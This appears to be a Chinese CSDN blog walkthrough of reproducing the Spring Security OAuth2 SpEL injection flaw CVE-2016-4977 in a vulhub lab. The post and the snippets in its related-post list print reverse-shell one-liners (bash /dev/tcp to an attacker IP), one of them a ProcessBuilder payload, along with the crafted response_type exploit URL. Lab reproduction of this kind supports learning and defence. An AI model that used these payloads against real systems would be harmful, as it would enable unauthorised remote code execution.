Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977)

最新推荐文章于 2023-12-04 16:22:18 发布
最新推荐文章于 2023-12-04 16:22:18 发布
阅读量668 收藏 1
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/119331150
版权

漏洞简介

Pivotal Spring Security OAuth 2.0.0版本至2.0.9版本和1.0.0版本至1.0.5版本中存在安全漏洞。远程攻击者可通过为‘response_type’参数制作值利用该漏洞执行代码。

漏洞复现

我们来进行反弹shell的操作,首先将bash命令进行编码

bash -i >& /dev/tcp/your-ip/9999 0>&1

在这里插入图片描述

我这里使用的是vulhub的环境,环境内有一个poc.py,用python3运行该脚本后,会让你输入字符,将编码后的字符复制进去:
在这里插入图片描述

最后自行更改POC为以上字符并访问该网址:http://your-ip:8080/oauth/authorize?response_type=[POC]&client_id=acme&scope=openid&redirect_uri=http://test
需要填写账户密码,vulhub的环境账户密码均为admin
在这里插入图片描述
在这里插入图片描述
返回监听端口查看:
在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cve-2016-4977(spring-security-oauth) RCE漏洞复现
m0_58596609的博客
04-21 4996
cve-2016-4977(spring-security-oauth) RCE漏洞复现
CVE-2016-4977(Spring-Security-Oauth)RCE远程命令执行漏洞复现(超详细版!)
精品博客,你值得一看~
09-02 993
它是为了解决企业应用开发的复杂性而创建的。Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞。#按 " i "进行编辑 ,然后复制下面的脚本 , 再按 " Esc "键 ,再按冒号wq " :wq " 保存并退出.先cd到spring目录下的CVE-2016-4977里面,然后使用docker-compose启动环境.
spring Security OAuth2 远程命令执行漏洞CVE-2016-4977)复现-kali
qq_41760817的博客
12-04 1222
spring Security OAuth2 远程命令执行漏洞CVE-2016-4977)复现
漏洞复现----39、Spring Security OAuth2 远程命令执行漏洞 (CVE-2016-4977)
七天
06-29 1219
Spring Security OAuth2 远程命令执行漏洞 (CVE-2016-4977)
【vulhub】 Spring boot Security OAuth RCE (CVE-2016-4977) 漏洞验证与getshell复现
qq_45300786的博客
07-30 2134
利用条件 0x01 影响版本 Spring Security OAuth 1.0.0到1.0.5 Spring Security OAuth 2.0.0到2.0.9 Spring Security OAuth 2.0到2.0.14 Spring Security OAuth 2.1到2.1.1 Spring Security OAuth 2.2到2.2.1 Spring Security OAuth 2.3到2.3.2 0x02 默认登录账号密码 admin\admin 访问路径/oauth/auth
spring-security-oauth2-2.3.5.RELEASE-API文档-中文版.zip
05-09
赠送jar包:spring-security-oauth2-2.3.5.RELEASE.jar; 赠送原API文档:spring-security-oauth2-2.3.5.RELEASE-javadoc.jar; 赠送源代码:spring-security-oauth2-2.3.5.RELEASE-sources.jar; 赠送Maven依赖信息...
spring-security-oauth2-2.3.5.RELEASE-API文档-中英对照版.zip
05-04
赠送jar包:spring-security-oauth2-2.3.5.RELEASE.jar; 赠送原API文档:spring-security-oauth2-2.3.5.RELEASE-javadoc.jar; 赠送源代码:spring-security-oauth2-2.3.5.RELEASE-sources.jar; 赠送Maven依赖信息...
spring-boot spring-security-oauth2 完整demo
11-22
spring-boot spring-security-oauth2 完整demo,可以使用微信的方式来获取token和查看资源,注意看代码中的备注
spring-security-oauth2文档
最新发布
03-26
spring-security-oauth2-boot-reference-2.6.8 是最后一版的官方文档
oauth2-server:基于Spring Security OAuth的统一账号管理平台
03-27
Spring安全OAuth2 Mybatis 环境依赖: JRE1.8 的Mysql5.7 配置说明 配置数据库 spring : datasource : driver-class-name : com.mysql.cj.jdbc.Driver username : root password : root url : jdbc:mysql://...
Spring漏洞(CVE-2016-4977)在IDEA中复现
wxzyyds的博客
11-03 1261
复现SpringCVE-2016-4977),并且在IDEA中实现动态调试
漏洞复现—Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273
weixin_45556536的博客
12-24 1077
CVE-2017-4971 // 注意反弹的端口和IP修改,反弹语句需要url编码 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub
复现CVE-2016-4977——Spring Security OAuth2 远程命令执行漏洞
记录并分享学习安全的知识点..
01-15 877
一、漏洞概述 Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。 二、漏洞复现 发现页面如下: poc如下: http://your-ip:8080/oauth/authorize?response_type=[POC]&client_id=acme
Spring Security OAuth2-远程代码执行 (CVE-2016-4977)
qq_43381463的博客
04-11 177
Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令
vulhub-CVE-2016-4977-SpringSecurityOauth RCE复现记录
weixin_42513429的博客
08-19 246
https://www.cnblogs.com/litlife/p/10380701.html https://blog.csdn.net/qq_45300786/article/details/119249422 参考别人的博客,对CVE-2016-4977进行复现 Spring Security OAuth SpEL表达式注入 影响范围(复制来的): Spring Security OAuth 1.0.0到1.0.5 Spring Security OAuth 2.0.0到2.0.9 Spring .
[详细]Apache Shiro身份验证越权漏洞[CVE-2016-6802][CVE-2020-1957]
qq_60115503的博客
11-07 2574
Apache Shiro是一个强大且易用的java安全框架,执行身份验证,授权,密码和会话管理,使用Shiro的API,可以快速获取任何应用程,从最小的移动应用到最大的网络和企业应用程序。
CVE-2016-4977 RCE in Spring Security OAuth漏洞分析
c0c0cf的专栏
09-21 1951
新浪微博: http://weibo.com/u/2275304001/home?wvr=5 微信公众号 DebugPwn 漏洞描述: When processing authorization requests using the whitelabel views, the response_type parameter value was executed
RCE with spring-security-oauth2漏洞复现(CVE-2018-1260)
公众号shadow sock7
04-29 1093
参考:https://xz.aliyun.com/t/2330 初始化:先根据https://github.com/wanghongfei/spring-security-oauth2-example 将内容保存为init.sql文件,然后启动mysql:参考https://blog.csdn.net/caiqiiqi/article/details/89642032 然后载入sql脚本: mys...
CVE-2016-4977
09-01
CVE-2016-4977是指Spring Security OAuth2远程命令执行漏洞。该漏洞的复现过程可以参考第一篇和第二篇的参考链接。该漏洞的影响版本较广泛,具体版本信息可以在参考链接中找到。该漏洞的利用方式可以使用bash命令进行远程执行,例如使用"bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/1122 0>&1"这样的命令进行利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【vulhub】 Spring boot Security OAuth RCE (CVE-2016-4977) 漏洞验证与getshell复现](https://blog.csdn.net/qq_45300786/article/details/119249422)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [cve-2016-4977(spring-security-oauth) RCE漏洞复现](https://blog.csdn.net/m0_58596609/article/details/124323206)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值